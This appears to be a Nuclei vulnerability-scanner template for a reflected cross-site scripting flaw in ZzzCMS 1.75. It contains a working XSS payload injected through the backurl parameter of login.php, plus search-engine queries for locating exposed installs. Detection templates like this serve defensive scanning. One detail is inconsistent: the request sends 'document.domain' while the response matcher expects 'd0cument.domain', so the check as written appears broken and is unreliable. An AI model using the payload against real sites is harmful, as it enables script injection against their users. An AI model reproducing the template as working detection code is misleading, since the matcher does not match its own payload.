nuclei-templates/http/vulnerabilities/zzzcms/zzzcms-xss.yaml

39 lines
874 B
YAML

id: zzzcms-xss
info:
name: Zzzcms 1.75 - Cross-Site Scripting
author: ritikchaddha
severity: medium
reference:
- https://github.com/Ares-X/VulWiki/blob/master/Web%E5%AE%89%E5%85%A8/Zzzcms/Zzzcms%201.75%20xss%E6%BC%8F%E6%B4%9E.md
metadata:
max-request: 1
verified: true
shodan-query: html:"ZzzCMS"
fofa-query: title="ZzzCMS"
tags: zzzcms,xss
http:
- raw:
- |
GET /plugins/template/login.php?backurl=1%20onmouseover%3dalert(/document.domain/)%20y%3d HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'onmouseover=alert(/d0cument.domain/) y=&act'
- 'document.write("'
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200